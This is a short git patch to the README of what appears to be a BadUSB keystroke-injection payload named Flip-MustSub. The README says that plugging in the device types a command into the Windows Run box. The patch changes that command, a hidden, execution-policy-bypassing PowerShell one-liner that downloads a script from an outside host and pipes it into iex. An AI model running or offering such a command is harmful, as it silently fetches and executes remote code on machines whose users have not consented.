From bf1cafc98caa43524329dfca869cef6d8c049772 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Sun, 1 Jan 2023 17:17:35 -0600 Subject: [PATCH] Update Readme.md --- Payloads/Flip-MustSub/Readme.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Payloads/Flip-MustSub/Readme.md b/Payloads/Flip-MustSub/Readme.md index 6a01c8e..9e7720f 100644 --- a/Payloads/Flip-MustSub/Readme.md +++ b/Payloads/Flip-MustSub/Readme.md @@ -45,7 +45,7 @@ Each URL will be passed through the subscribe function. * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload ``` -powershell -w h -NoP -NonI -Ep Bypass iwr jakoby.lol/14q | iex +powershell -w h -NoP -NonI -Ep Bypass irm jakoby.lol/14q | iex ```

(back to top)